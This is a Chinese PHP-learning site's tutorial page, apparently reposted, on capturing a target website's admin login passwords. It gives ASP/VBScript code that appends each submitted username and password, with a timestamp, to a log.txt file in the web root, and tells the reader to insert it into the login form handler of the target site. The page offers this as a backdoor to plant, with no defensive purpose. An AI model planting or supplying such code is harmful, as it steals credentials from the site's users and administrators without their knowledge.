网站地图    收藏   

主页 > 后端 > 网站安全 >

asp截获后台登录密码 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 通过修改后台登陆代码获得目标网站的用户登录密码。具体代码:set fso=server.createobject(scripting.filesystemobject)if fso.FileExists(server.mappath(log.txt))=true then set fin=fso.OpenTextF......

通过修改后台登陆代码获得目标网站的用户登录密码。
 
 
 
具体代码:
 
set fso=server.createobject("scripting.filesystemobject")
  
if fso.FileExists(server.mappath("log.txt"))=true then
 
     set fin=fso.OpenTextFile(server.mappath("log.txt"))
 
 
    temp=fin.readall
 
 
    fin.close www.2cto.com
 
 
    set fin=nothing
 
  
 
end if
 
set fout=fso.createtextfile(server.mappath("log.txt"))
 
 
fout.WriteLine(temp&"user:"&username&"¦pwd:"&password&"¦time:"&now()&"")
fout.close
set fout=nothing
 
set fso=nothing
 
 
 
 
在后台登录处表单提交的地方插入

作者 乐乐's Blog

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论